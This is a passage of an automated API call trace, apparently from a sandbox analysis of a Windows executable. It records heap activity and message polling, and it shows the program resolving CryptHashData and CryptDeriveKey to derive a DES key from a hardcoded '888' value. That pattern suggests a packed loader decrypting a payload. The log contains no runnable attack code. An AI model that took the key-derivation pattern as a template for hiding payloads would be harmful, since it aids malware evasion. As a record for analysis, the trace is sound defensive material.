| out: hHeap=0x970000) returned 1 [0224.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0224.387] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0224.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0224.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0224.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f18 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0224.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0224.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0224.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0224.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0224.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0224.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0224.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0224.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55088 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0224.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0224.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0224.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0224.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0224.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0224.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0224.388] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0224.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0224.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0224.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0224.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0224.389] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0224.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0224.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0224.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0224.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0224.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0224.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0224.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0224.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0224.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0224.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0224.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0224.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0224.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.427] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0224.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0224.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51388, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0224.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0224.428] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0224.429] CryptHashData (hHash=0xa873d0, pbData=0x2e55108, dwDataLen=0x3, dwFlags=0x1) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0224.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0224.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0224.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0224.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0224.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0224.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0224.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0224.437] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0224.437] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0224.437] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0224.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0224.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0224.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0224.438] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0224.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0224.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0224.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0224.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0224.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0224.438] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0224.438] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0224.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0224.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0224.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0224.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0224.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0224.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0224.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0224.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e512c8 [0224.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e512c8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0224.439] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa873d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa875d0) returned 1 [0224.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0224.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0224.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0224.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0224.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0224.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0224.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0224.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0224.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0224.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0224.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0224.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0224.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0224.440] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.440] RtlAllocateHeap (HeapHandle=0x970000, 